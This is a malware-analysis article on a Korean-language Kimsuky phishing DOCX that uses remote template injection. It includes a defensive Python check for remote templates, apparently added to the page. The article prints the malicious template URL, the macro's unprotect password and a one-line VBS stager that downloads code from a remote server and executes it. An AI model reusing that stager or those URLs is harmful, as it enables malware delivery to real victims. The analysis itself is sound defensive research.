Malicious Document Analysis By Kimsuky

Introduction

This article covers a malicious DOCX document that was distributed by email and targeted South Korea. Based on the analysis, the attacker is likely to be the Kimsuky Group.

When the malicious DOCX is opened, the URL embedded in the document's XML is reached through an "external link" relationship, which downloads a further template file. The VBA macro in that malicious template then downloads and executes the next-stage payload.

Analysis

DOCX Filename:

업무보고.docx
Business report.docx

DOCX Title:

바이든 미행정부 대북전략과 한반도의 진로
Biden’s US Administration’s Strategy toward North Korea and the Path of the Korean Peninsula

External address:

http://koreacit.co.kr/skin/new/basic/update/temp?q=6

The document uses Word's protection feature and its text is set to hidden, so the content cannot be viewed until the macro runs.

Inside the DOCX, \word\_rels\ contains the following settings.xml.rels file, which makes Word download and load another malicious macro document (a template) from the external address.
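A defender-side check for the technique just described, added here as an example and not taken from the page or from the attacker's code: it opens a DOCX as a ZIP, reads word/_rels/settings.xml.rels and reports any attachedTemplate relationship whose target is a remote address. The sample document is constructed in memory and the helper names are my own.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")


def find_external_templates(docx_bytes):
    """Return remote attachedTemplate targets found in
    word/_rels/settings.xml.rels, or [] if the document has none.
    A remote template target is the hallmark of template injection."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return hits
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("Type") == TEMPLATE_REL and rel.get("TargetMode") == "External":
            target = rel.get("Target", "")
            # Only flag network locations (URL or UNC path); a local .dotm
            # attached template is normal for many corporate documents.
            if re.match(r"^(https?|ftp|file)://|^\\\\", target, re.I):
                hits.append(target)
    return hits


def build_sample_docx(template_target, target_mode="External"):
    """Constructed minimal DOCX containing only the parts the check reads."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" '
        f'Target="{template_target}" TargetMode="{target_mode}"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # The external address reported on this page, embedded in a constructed file.
    sample = build_sample_docx("http://koreacit.co.kr/skin/new/basic/update/temp?q=6")
    print(find_external_templates(sample))
```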

The strings in the template file's VBA macro code are obfuscated. When the macro runs, a malicious .xml file (actually a VBS script) is created and executed in the user's template folder.

  • The ViewPage function removes the decoy image from the DOCX and reveals the hidden document text.
  • The MainPage function drops the VBS script, which downloads and executes the next-stage VBS from the remote server.
  • The AutoOpen function uses the password 1qaz2wsx to unprotect the DOCX.

Command

wscript.exe //e:vbscript //b C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Templates\1589989024.xml

1589989024.xml

On Error Resume Next:Set mx = CreateObject("MSXML2.ServerXMLHTTP.6.0"):mx.open "GET", "http://koreacit.co.kr/skin/new/basic/update/list.php?query=1", False:mx.Send:Execute(mx.responseText)

IOCs
